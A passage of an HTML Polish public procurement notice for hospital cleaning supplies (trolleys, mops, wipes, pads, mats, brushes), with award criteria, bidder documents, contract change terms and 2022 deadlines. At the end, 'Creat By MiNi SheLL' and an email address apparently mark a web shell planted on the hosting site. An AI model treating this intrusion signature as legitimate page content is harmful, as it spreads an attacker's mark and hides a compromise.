class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny i kosztu </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Lp	Szczegółowa nazwa przedmiotu zamówienia	J.m.	Ilość jednostek miary	Cena jednostkowa netto	Wart. Netto	Stawka VAT	Wart. Brutto	Nazwa handlowa, nazwa producenta, nr katalogowy producenta<br/>1.	Wózek kuwetowy do sprzątania, na podstawie jezdnej z 4 kołami, wyposażony w dwa jasno niebieskie wiaderk 6 litrowe z pokrywami (1 wiaderko z klipsem niebieskim, jedno z klipsem czerwonym)oraz dwie kuwety na mopy zamykane, w kolorze jasno niebieskim z pokrywami (1 kuweta z klipsem niebieskim, jedna z klipsem czerwonym). Uchwyt na worki 2 x 70litrów, pokrywa na worek na odpady 2 szt x 70 litr, zacisk do worka na odpady metalowy. Podstawa do postawienia mopa i uchwyt do kija.	zestaw	3 <br/>2.	Zestaw do sprzatania dwuwiaderkowy z wyciskarką do mopów, rączką do prowadzenia oraz koszykiem na środki czystości. Stelaż wykonany ze stali chromowanej, wiaderka i koszyk z wytrzymałego tworzywa sztucznego. Wózek wyposażony w 2 wiaderka z rączką w kolorze niebieskim i czerownym, o poj. 17-25 l., podstawa jezdn na 4 kółkach.	zestaw	5 <br/>3.	Pokrywa jasnoniebieska do worków o poj. 120l z klipsami kodującymi pasująca do wózka Origo 300 Vileda (częsci naprawcze do wyposażenia posiadanego przez Zamawiającego)	sztuka	10 <br/>4.	Uchwyt do worków na śmieci Origo - komplet pasująca do wózka Origo 300 Vileda (częsci naprawcze do wyposażenia posiadanego przez Zamawiającego)	zestaw	5 <br/>5.	Pokrywa do kuwet duża z klipsem kodujacym pasująca do wózka Origo 300 Vileda (częsci naprawcze do wyposażenia posiadanego przez Zamawiającego)	sztuka	10 <br/>6.	Pokrywa do wiaderek z klipsem kodujacym pasująca do wózka Origo 300 Vileda (częsci naprawcze do wyposażenia posiadanego przez Zamawiającego)	sztuka	10 <br/>7.	Zestaw: Kij teleskopowy + uchwyt na mopa płaskiego o szerokości 40 cm. Uchwyt na mopa płaskiego, o niskim profilu, otwierany pedałem nożnym. Szybkie zakładanie i zdejmowanie mopa z obudowy dzięki dedykowanej nakładce bez elementów mechanicznych. Przegub ruchomy z łożyskami kulkowymi usprawnia czyszczenie powierzchni pionowych. Kij aluminiowy teleskopowy regulowany od 100 do 180 cm, z antyposlizgowym górnym uchwytem, z mozliwością kodowana kolorystycznego.	zestaw	50 <br/>RAZEM </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34911100-7 - Wózki</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje skorzystanie z prawa opcji zgodnie z postanowieniami projektu umowy w tym zakresie. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny i kosztu </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Lp	Szczegółowa nazwa przedmiotu zamówienia	J.m.	Ilość jednostek miary	Cena jednostkowa netto	Wart. Netto	Stawka VAT	Wart. Brutto	Nazwa handlowa, nazwa producenta, nr katalogowy producenta<br/>1.	Mop do profesjonalnego użytku, przetykany - nakładka o wysokich właściwościach czyszczących i trwałości, o szerokości 40 cm (wymiar wewnętrzny). Pasuje do stelaży o szerokości 40 cm. Mieszanka włókien wg składu %: kolor biały - 100% mikrofaza - właściwości czyszczące; kolor szary: mieszanina 70 %poliester + 30% bawełna - odpowiadająca za trwałość, kolor beżowy - 75% bawełna, 20% poliester i 5% wiskoza. Obszycie mopa wykonane w 100% z poliestru - odpowiadające za trwałość. Mocowanie mopa kieszeniowo - taśmowe, możliwiające bezdotykowe nakładanie. Temeratura prania: 95 stopni C. Możliwość dezynfekcji w autoklawie (potwierdzone przez producenta). Gwarancja wytrzymałości, bez zmiany właściwości materiału do 500 cykli prania przeprowadzonych w profesjonalnej pralnicy w temperaturze 95 stopni C (potwierdzone przez producenta). Waga mopa min 165 gram, chłonność mopa 500 ml. Nakładka musi posiadać możliwe do odcięcia lamelki do oznaczania stref czystości w 4 kolorach (niebieski, zielony, żółty, czerwony). Personalizacja produktu - na wewnętrznej stronie mopa nadruk 5WSZK. Wysokość nadruku ok. 2 cm.	sztuka	3000 <br/>2.	Ściereczki jednorazowe suche, przeznaczone do sprzatania i nasączania preparatem myjącym lub dezynfekcyjnym. Ściereczki nawinięte na roli, w odcinkach wielkości 16 x 40 cm z perfracją. (Tolerancja wymiarów +/- 10%). Ilość ściereczek na roli 200 szt. Każda rolka zabezpieczona folią. Ściereczki wykonane z niepylnej i niestrzępiącej włókniny w kolorze białym lub niebieskim. Skład włókniny: polipropylen/ celuloza lub polipropylen / wiskoza. Gramatura włokniny: min 50g/m2. Wytrzymałe i odporne na działanie środków myjących i dezynfekcyjnych. Każda rolka zawiera samoprzylepną etykietę zawierające informację o produkcie stosowanym wenątrz. (data, rodzaj zastosowanego środka dezynfekcyjnego).	sztuka	1000 <br/>3.	Zestaw: Wiaderko plastikowe o pojemności 5-7 litrów, z uchwytem do przenoszenia i pokrywką wyposażoną w otwór dozujący ściereczki. Wiaderko plastikowe wykonane z HDPE w kolorze białym, wraz z wkładem: rolką ściereczek z pozycji nr 2. Zestaw zawiera samoprzylepną etykietę zawierające informację o produkcie stosowanym wenątrz, oraz z możliwością naniesienia danych: data sporządzenia roztworu, rodzaj środka i stężenie środka dezynfekcyjnego. Szczelne zamknięcie wiaderka chroni przed wysychaniem nasączonych chusteczek.	zestaw	100 <br/>RAZEM </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39525800-6 - Ściereczki do czyszczenia</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje skorzystanie z prawa opcji zgodnie z postanowieniami projektu umowy w tym zakresie. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny i kosztu </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Lp	Szczegółowa nazwa przedmiotu zamówienia	J.m.	Ilość jednostek miary	Cena jednostkowa netto	Wart. Netto	Stawka VAT	Wart. Brutto	Nazwa handlowa, nazwa producenta, nr katalogowy producenta<br/>1.	Pad brązowy do czyszczenia 19&#39;&#39;, wymiar 432 mm x 85 mm, pasujący do maszyny czyszczącej TASKI ERGODISC, posiadający wstepnie wycięty otwór centralny.	sztuka	25 <br/>2.	Pad czarny do czyszczenia 19&#39;&#39;, wymiar 432 mm x 85 mm, pasujący do maszyny czyszczącej TASKI ERGODISC, posiadający wstepnie wycięty otwór centralny.	sztuka	25 <br/>3.	Pad biały do polerowania 20&#39;, wymiar 505 mm, wykonany z wysokiej jakości włókien syntetycznych, o otwartej budowie włókninowej, zawierający cząsteczki polerujące rozproszone w materiale i związane wytrzymałym spoiwem, posiadający wstepnie wycięty otwór centralny.	sztuka	25 <br/>4.	Pad ręczny do gruntownego doczyszczania miejsc trudnodostępnych, kolor brązowy i czarny wymiary 25 x 12 x 2 cm (tolerancja wymiarów +/- 10%).	sztuka	50 <br/>5.	Packa na kiju do padów ręcznych z kijem o długości 140 cm, pasująca do padów ręcznych z pozycji nr 4.	sztuka	30 <br/>6.	Pojemnik prostokątny typu CURVER ze szczelnie zamykaną pokrywą z zamontowanymi kółkami z tworzywa sztucznego o poj. 100 l.	sztuka	10 <br/>7.	Jednokolorowa wycieraczka wejściowa, wykonana z włókna nylonowego z antypoślizgowym gumowym spodem. Spód wykonany 100% z gumy nitrylowej. Mata zakończona wzmocnionymi gumowymi rantami, które zapobiegają podwijaniu się jej brzegów. Wymiar ok. 60 cm x 90 cm. Tolerancja wymiarów +/- 5%.	sztuka	50 <br/>8.	Jednokolorowa wycieraczka wejściowa, wykonana z włókna nylonowego z antypoślizgowym gumowym spodem. Spód wykonany 100% z gumy nitrylowej. Mata zakończona wzmocnionymi gumowymi rantami, które zapobiegają podwijaniu się jej brzegów. Wymiar ok. 60/80 cm x 120 cm. Tolerancja wymiarów +/- 5%.	sztuka	20 <br/>9.	Jednokolorowa wycieraczka wejściowa, wykonana z włókna nylonowego z antypoślizgowym gumowym spodem. Spód wykonany 100% z gumy nitrylowej. Mata zakończona wzmocnionymi gumowymi rantami, które zapobiegają podwijaniu się jej brzegów. Wymiar ok. 90 cm x 150 cm. Tolerancja wymiarów +/- 5%.	sztuka	20 <br/>10.	Jednokolorowa wycieraczka wejściowa, wykonana z włókna nylonowego z antypoślizgowym gumowym spodem. Spód wykonany 100% z gumy nitrylowej. Mata zakończona wzmocnionymi gumowymi rantami, które zapobiegają podwijaniu się jej brzegów. Wymiar ok. 120 cm x 180 cm. Tolerancja wymiarów +/- 5%.	sztuka	10 <br/>11.	Wycieraczka gumowa ażurowa zewnetrzna na stopnie schodów, wymiary: 75/80 cm x 25 cm + kątownik. Tolerancja wymiarów +/- 5%.	sztuka	10 <br/>12.	Wycieraczka gumowa z bolcami i najazdem, zewnętrzna o wymiarach, wymiary: 120 cm x 60/80 cm. Tolerancja wymiarów +/- 5%.	sztuka	5 <br/>13.	Szczotka z WC z pojemnikiem, kolor niebieski lub biały, wykonana z tworzywa sztucznego odporny na uszkodzenia oraz wilgoć.	zestaw	150 <br/>14.	Wiaderko małe z uchwytem o poj 10 l, kolor niebieski lub zielony. Wykonane z tworzywa sztucznego.	sztuka	50 <br/>15.	Miska o poj 6-10 l wykonana z tworzywa sztucznego, kolor niebieski lub zielony, kształt okrągły, średnica maksymalna 300 mm. Odporne na działania środków dezynfekcyjnych.	sztuka	50 <br/>16.	Zmiotka gumowa z szufelką, posiada specjalane gumowe włosie, zapobiegające namnażaniu się bakteri oraz umożliwiające łatwe utrzymania w czystości. Gumowe wypustki z mikrocząsteczkami srebra. Kolorystyka szaro niebieska.	zestaw	50 <br/>17.	Miotła gumowa z kijem teleskopowym o długości 120-130 cm. Miotła posiada specjalane gumowe włosie zapobiegające namnażaniu się bakteri oraz umożliwiające łatwe utrzymania w czystości. Gumowe wypustki z mikrocząsteczkami srebra. Miotła posiada ściągacz do wody i sprzątania wszelkiego rodzaju rozlanych płynów. Kolorystyka szaro niebieska.	sztuka	50 <br/>18.	Miotła do zamiatania z twardym włosiem, szerokość szczotki ok. 40 cm, kij z tworzywa sztucznego. Kij o długości 130-140 cm.	sztuka	5 <br/>19.	Szczotka trwarda na kiju plastikowym. Szczotka o szerokości ok. 20- 30 cm. Kij długość ok. 130-140 cm. Szczotka przeznaczona jest do szorowania twardych powierzchni takich jak kamienie, cegły, beton, kostka, gres.	zestaw	50 <br/>20.	Ściągaczka do okien i szyb. Wykonana z tworzywa sztucznego. Kolorystyka szaro niebieska.	sztuka	50 <br/>21.	Szczotka ryżowa mała z uchwytem do trzymania. Wykonana z tworzywa sztucznego. Długośc ok 16 cm. Kolorystyka szaro niebieska.	sztuka	50 <br/>22.	Zmywak do powierzchni, profilowany duży - wymiary: 150 mm x 80 mm x 40mm (+/-10 mm). Opakowanie 3 szt.	opakowanie	100 <br/>23.	Zmywak kuchenny (gąbka) do mycia naczyń - wymiary: 100 mm x 70 mm x 30 mm (+/-10 mm). Opakowanie 5 szt.	opakowanie	200 <br/>RAZEM </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39830000-9 - Środki czyszczące</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje skorzystanie z prawa opcji zgodnie z postanowieniami projektu umowy w tym zakresie. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny i kosztu </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">nie dotyczy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">nie dotyczy</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 10.1.5	Kartę techniczną (ulotki,) oraz kartę charakterystyki produktu, odrębnie dla każdej pozycji pakietu, zawierających opis i parametry zawarte w opisie przedmiotu zamówienia (tzn.: zastosowanie, kolor, pojemność opakowania, pH, gęstość, itp.) dla każdej pozycji ( dotyzy pakietu nr 1),<br/>10.1.6	Kartę techniczną wraz ze zdjęciem (ulotki) odrębnie dla każdej pozycji pakietu, zawierających opis i parametry zawarte w opisie przedmiotu zamówienia (tzn.: wymiary, kolor, pojemność, rodzaj materiału, wyposażenie itp.) dla każdej pozycji ( dotyzy pakietu nr 2),<br/>10.1.7	Kartę techniczną wraz ze zdjęciem (ulotki) odrębnie dla każdej pozycji pakietu, zawierających opis i parametry zawarte w opisie przedmiotu zamówienia (tzn.: wymiary, kolor, rodzaj materiału itp.) dla każdej pozycji ( dotyzy pakietu nr 3),<br/>10.1.8	Kartę techniczną wraz ze zdjęciem (ulotki) odrębnie dla każdej pozycji pakietu, zawierających opis i parametry zawarte w opisie przedmiotu zamówienia (tzn.: wymiary, kolor, skład, rodzaj materiału itp.) dla każdej pozycji oraz próbki oferowanego asortymentu po 1 sztuce z pozycji nr 1, 2, 3 ( dotyzy pakietu nr 4),<br/>10.1.9	Kartę techniczną wraz ze zdjęciem (ulotki) odrębnie dla każdej pozycji pakietu, zawierających opis i parametry zawarte w opisie przedmiotu zamówienia (tzn.: wymiary, kolor, pojemność, rodzaj materiału itp.) dla każdej pozycji ( dotyzy pakietu nr 5), <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 10.1.5	Kartę techniczną (ulotki,) oraz kartę charakterystyki produktu, odrębnie dla każdej pozycji pakietu, zawierających opis i parametry zawarte w opisie przedmiotu zamówienia (tzn.: zastosowanie, kolor, pojemność opakowania, pH, gęstość, itp.) dla każdej pozycji ( dotyzy pakietu nr 1),<br/>10.1.6	Kartę techniczną wraz ze zdjęciem (ulotki) odrębnie dla każdej pozycji pakietu, zawierających opis i parametry zawarte w opisie przedmiotu zamówienia (tzn.: wymiary, kolor, pojemność, rodzaj materiału, wyposażenie itp.) dla każdej pozycji ( dotyzy pakietu nr 2),<br/>10.1.7	Kartę techniczną wraz ze zdjęciem (ulotki) odrębnie dla każdej pozycji pakietu, zawierających opis i parametry zawarte w opisie przedmiotu zamówienia (tzn.: wymiary, kolor, rodzaj materiału itp.) dla każdej pozycji ( dotyzy pakietu nr 3),<br/>10.1.8	Kartę techniczną wraz ze zdjęciem (ulotki) odrębnie dla każdej pozycji pakietu, zawierających opis i parametry zawarte w opisie przedmiotu zamówienia (tzn.: wymiary, kolor, skład, rodzaj materiału itp.) dla każdej pozycji oraz próbki oferowanego asortymentu po 1 sztuce z pozycji nr 1, 2, 3 ( dotyzy pakietu nr 4),<br/>10.1.9	Kartę techniczną wraz ze zdjęciem (ulotki) odrębnie dla każdej pozycji pakietu, zawierających opis i parametry zawarte w opisie przedmiotu zamówienia (tzn.: wymiary, kolor, pojemność, rodzaj materiału itp.) dla każdej pozycji ( dotyzy pakietu nr 5), <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 10.1	Dokumenty wraz z ofertą!!!!!!!!!!!!!!!!!!!! :<br/>10.1.1	Wypełniony i podpisany we wskazanych miejscach Załącznik nr 1 – formularz opis przedmiotu zamówienia – zestawienie wymaganych i oferowanych parametrów,<br/>10.1.2	Wypełniony we wskazanych miejscach i podpisany Załącznik nr 2 –formularz ofertowy,<br/>10.1.3	Dokumenty rejestrowe potwierdzające posiadanie uprawnień/pełnomocnictwa potwierdzające umocowanie osób do składania oferty w imieniu Wykonawcy,<br/>10.1.4	Oświadczenie o braku podstaw wykluczenia z postępowania stanowiące wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu z postępowania według wzoru stanowiącego Załącznik nr 3 do SWZ (wypełnić pkt 3!!!! ewentualnie oświadczenie z pkt 4 dotyczące wykazanie rzetelności w sytuacji podleganiu wykluczeniu, ewentualnie oświadczenie z pkt 5, czyli oświadczenie Wykonawcy dotyczące podmiotu na które zasoby lub sytuację na które się wykonawca powołuje w zakresie braku podstaw do wykluczenia tego podmiotu),<br/>10.1.10	Potwierdzenie wniesienia wadium, (o ile jest to wymagane). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 13.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>14.	W przypadku składania ofert przez podmioty ubiegające się wspólnie o udzielenie zamówienia należy dołączyć pełnomocnictwo do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>15.	Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana, Zamawiający będzie mógł żądać przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych Wykonawców<br/>16.	W przypadku, gdy Wykonawca w miejsce któregoś z dokumentów, o których mowa w SWZ dostarczy jego kopię, kopia ta musi być poświadczona za zgodność z oryginałem przez Wykonawcę. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów udostępniających Wykonawcy zasoby, kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów powinny być poświadczane za zgodność z oryginałem przez Wykonawcę lub te podmioty. Zamawiający może zażądać przedstawienia oryginałów lub notarialnie potwierdzonych kopii dokumentów (np. jeśli przedstawione kserokopie będą nieczytelne lub będą wzbudzać wątpliwości co do ich prawdziwości).<br/>17.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wszelkie zmiany niniejszej umowy wymagają formy pisemnej pod rygorem nieważności.<br/>2.	Kupujący przewiduje możliwość zmiany umowy w stosunku do treści oferty na podstawie, której dokonano wyboru oferty Sprzedającego na wniosek którejkolwiek ze stron, jeżeli konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te są korzystne dla Kupującego lub też dotyczą: <br/>1)	zmiany świadczenia Sprzedającego na świadczenie lepszej jakości przy zachowaniu tożsamości towaru,<br/>2)	wydłużenia terminu wykonania umowy z powodu okoliczności niezależnych od Sprzedającego,<br/>3)	zmiany danych Sprzedającego ( np. zmiana siedziby, adresu, nazwy),<br/>4)	działania siły wyższej lub wystąpienia stanu wyższej konieczności<br/>5)	zmian organizacyjnych Kupującego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe<br/>6)	zmian w zakresie sposobu wykonywania zadań lub zasad funkcjonowania Kupującego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe lub zaistniała konieczność modyfikacji przedmiotu zamówienia,<br/>7)	omyłek pisarskich lub błędów rachunkowych,<br/>8)	mających na celu wyjaśnienie wątpliwości treści umowy, jeśli będzie ona budziła wątpliwości interpretacyjne między stronami,<br/>9)	zmiany stawki podatku VAT na towar,<br/>10)	jeżeli zmiany umowy, w tym zmiany sposobu płatności, wymagać będzie ochrona interesu Kupującego,<br/>11)	innych zmian korzystnych dla Kupującego, w tym polegających na zamianie towarów na elementy o lepszych lub/i odpowiedniejszych parametrach technicznych chociażby wiązało się to z koniecznością zmiany terminu lub sposobu wykonania zamówienia.<br/>3. Strony ustalają, iż zmiana numeru katalogowego, nazwy przedmiotu zamówienia, liczby opakowań, wielkości opakowań niepowodującej zmiany przedmiotu zamówienia, nie stanowi zmiany umowy i nie wymaga aneksu. Sprzedający zobowiązany jest do niezwłocznego powiadomienia Kupującego o tym fakcie. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-23 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy przesłać na skrytkę Zamawiającego na portalu e-puap: /5wszkzp/SkrytkaESP</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-23 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-04-21</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com